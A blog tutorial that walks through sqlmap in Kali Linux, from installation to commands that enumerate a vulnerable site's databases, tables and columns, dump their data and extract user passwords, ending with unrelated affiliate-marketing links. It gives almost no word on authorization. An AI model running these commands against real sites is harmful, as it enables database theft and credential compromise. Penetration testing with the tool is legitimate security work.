How to use SQLmap in Kali Linux ? Full Explanation and Documentation.

How to use SQLmap in Kali Linux ? Full Explanation and Documentation. 

Now it is recommended that you go through the above tutorial once so that you can get an idea about how to find vulnerable sites. In this tutorial we’ll skip the first few steps in which we find out whether a website is vulnerable or not, as we already know from the previous tutorial that this website is vulnerable.

Kali Linux

First off, you need to have Kali linux (or backtrack) up and running on your machine. Any other Linux distro might work, but you’ll need to install Sqlmap on your own. Now if you don’t have Kali Linux installed, you might want to go to this page, which will get you started on Beginner Hacking Using Kali Linux

Sqlmap

Basically its just a tool to make Sql Injection easier. Their introduces the tool as -“sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system found on the SqlMap website:- We are going to do this on a test site.

GET method based SQL injection will be demonstrated using SQL map in this tutorial. 

SQLmap also has capability to crack hashed password. SQL map comes preinstalled in Kali Linux. If you are using another Linux distro like Debian, Ubuntu, or arch you can easily get it from the official repositories.

SQLmap is a terminal based application. So fire up your terminal and just type sqlmap to check if it is already installed.

Install SQLmap

Debian and Ubuntu based distros

#sudo apt-get install sqlmap

Arch based distros

#sudo pacman -Syy sqlmap

RedHat based distros

#sudo yum install sqlmap

Once SQLmap is installed then all you need is a vulnerable target to see its magic.

SQL injection using SQLmap

Basic command structure is very simple. First you write sqlmap and then URL followed by specific wildcards of where you want the injection to occur.

#sqlmap -u "url"

This command will perform SQL injection on the target and report back if specified target is vulnerable or not. Assuming that target is vulnerable, all the possible SQL injection attacks will be listed for that target. In order to render out some information, first you need to get the list of available databases available at target machine.

#sqlmap -u "url" --dbs

–dbs option here will enlist all the available databases on the target machine if the target is vulnerable to SQL injection. Once you get the list of your databases, the next step is to get the list of all the tables of selected database.

#sqlmap -u "url" --tables -D database-name.

here –table option is used to extract the list of all the tables in the selected database. -D option is used to specify the database name that you found out in the previous step. Next you need to enlist all the columns in the table.

#sqlmap -u "url" --columns -D database-name -T table-name 

Now –columns option will tell the sqlmap to get the name of all the columns and additional -T argument is used to specify the table name from which you want to enlist all the columns.

Once you get the columns’ name, either you can dump the whole columns’ data into csv file from the database or you can dump the data from selected fields.

#sqlmap -u "url" --dump -D database -name -T table-name 

Here this command will tell the sqlmap to dump all the data from the database-name where table table-name exists.

You can also dump the whole database by using following command

#sqlmap -u "url" --dump -D database-name.

Check user is a database administrator

To see if the current user has root access to the database management system, issue the following command.

#sqlmap -u "url" -o -b --current-user --is-dba

If current user turns out be a root user you can extract the password for that user and all the other users. Use the following command.

#sqlmap -u "url" -v1 --current-user --password

SQLmap on multiple target list.

sqlmap is a very flexible tool. You can give it any number of target in a text file and it will test all the targets on time.

#sqlmap -m "path-to-file" --batch 

here batch option will process all the target with default options.
SQL map also has password cracking capability. It can perform dictionary attack on the found hashes. Hash cracking process will take time according to your CPU power. You can also find about other security testing tools.

Frequently Asked Questions

How do I earn money with affiliate marketing?

Who Can Be An Affiliate Marketing Program Seller?

How do I know what's popular?

How do I find products and companies to promote?

How do I promote affiliate products?

People are also reading:

• Smartphone Circuit Diagram information.
• 10 Best Ethical Hacking Books for Beginner to Advanced Level.
• Best Online Teaching Platforms Name for Teachers
• Affiliate Marketing For Beginners to Advance Successful Strategy.
• Best Password cracking techniques used by hackers. Explanation
• How many types of darknet user software and website.
• What is PageMaker? PageMaker Introduction
• How to become an operations manager ? Build leadership skills.
• Popular Types of Information Systems and Their Applications

Thanks for read my blogpost.
       #Mr Princeson Team